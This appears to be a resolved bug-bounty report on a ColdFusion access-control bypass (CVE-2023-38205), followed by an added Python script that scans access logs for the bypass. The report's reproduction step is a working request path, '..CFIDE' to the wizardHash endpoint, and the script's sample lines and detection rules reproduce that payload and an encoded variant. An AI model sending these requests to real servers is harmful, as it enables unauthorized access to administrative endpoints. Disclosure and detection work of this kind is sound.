Adobe ColdFusion - Access Control Bypass [CVE-2023-38205] at ██████
High
U.S. Dept Of Defense
Reported by mega7
Vulnerability Details
Technical details and impact analysis
Hello Gents, I would like to report an issue where attackers are able to bypass the product feature that restricts external access to the ColdFusion Administrator. [CVE-2023-38205] at `██████`
## Steps to reproduce
+ Please open the following link:
> https://█████████/hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx
## Proof of concept
+ ████
## Impact
Access Control Bypass.
Thanks and have a nice day!
## System Host(s)
██████
Related CVEs
Associated Common Vulnerabilities and Exposures
CVE-2023-38205
HIGH
Adobe ColdFusion versions 2018u18 (and earlier), 2021u8 (and earlier) and 2023u2 (and earlier) are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to access the administration CFM and CFC endpoints. Exploitation of this issue does not require …
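The report's PoC reaches a CFIDE wizard endpoint through a path that does not begin with `/CFIDE/` (the `..CFIDE` segment), which is exactly the shape a prefix-based access restriction fails to see. The following detection snippet is an added example for defenders, not part of the report or of Adobe's guidance: it parses Common Log Format access-log lines (the sample lines are constructed here, with one mirroring the report's URL and one using URL-encoded dots) and tags requests that mention `CFIDE` outside the canonical prefix, carry a `..`-prefixed segment, call `wizardHash` with an `inPassword` parameter, or were answered 2xx despite the non-canonical path. The tag names and the heuristics are this example's own assumptions, not a vendor signature.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (Common Log Format); not taken from the report.
# Line 2 mirrors the report's PoC shape; line 4 is the same idea with URL-encoded dots.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jul/2023:12:00:01 +0000] "GET /index.cfm HTTP/1.1" 200 512
203.0.113.7 - - [10/Jul/2023:12:00:02 +0000] "GET /hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1" 200 300
203.0.113.7 - - [10/Jul/2023:12:00:03 +0000] "GET /CFIDE/administrator/index.cfm HTTP/1.1" 403 0
203.0.113.7 - - [10/Jul/2023:12:00:04 +0000] "GET /images/%2e%2eCFIDE/administrator/index.cfm HTTP/1.1" 200 1200
"""

# Minimal CLF parser: client ip, timestamp, method, request target, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def analyse_request(target: str, status: str) -> list[str]:
    """Return detection tags (assumed names) for one request target and its status code."""
    findings = []
    parts = urlsplit(target)
    path = unquote(parts.path)              # decode %2e etc. before inspecting
    segments = [s for s in path.split("/") if s]
    upper = path.upper()
    canonical_admin = upper.startswith("/CFIDE/")
    mentions_cfide = "CFIDE" in upper

    # "CFIDE" reached through a path that does not start with /CFIDE/: a prefix-based
    # access restriction never sees these requests.
    if mentions_cfide and not canonical_admin:
        findings.append("cfide-noncanonical-path")

    # A segment that starts with ".." but is not a plain parent reference ("..CFIDE").
    if any(s.startswith("..") and s != ".." for s in segments):
        findings.append("dotdot-prefixed-segment")

    # The wizardHash call shown in the report takes a password-like parameter.
    query = parse_qs(parts.query)
    methods = [m.lower() for m in query.get("method", [])]
    if "wizardhash" in methods and "inPassword" in query:
        findings.append("wizardhash-password-probe")

    # Non-canonical CFIDE path answered with 2xx: the restriction did not hold.
    if mentions_cfide and not canonical_admin and 200 <= int(status) < 300:
        findings.append("noncanonical-cfide-served-2xx")
    return findings


def scan_log(text: str) -> list[tuple[str, str, list[str]]]:
    """Parse CLF lines and return (client ip, target, findings) for each suspicious request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = analyse_request(m["target"], m["status"])
        if findings:
            hits.append((m["ip"], m["target"], findings))
    return hits


if __name__ == "__main__":
    for ip, target, findings in scan_log(SAMPLE_LOG):
        print(f"{ip} {target}\n    {', '.join(findings)}")
```

Decoding the path before inspection matters: the fourth sample line only shows its `..CFIDE` segment after `%2e%2e` is unquoted. The `noncanonical-cfide-served-2xx` tag is the one worth paging on, since it indicates the restriction was bypassed rather than merely probed; the canonical `/CFIDE/administrator/` request that received a 403 produces no findings at all.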
Report Details
Additional information and metadata
State: Closed
Substate: Resolved
Weakness: Improper Access Control - Generic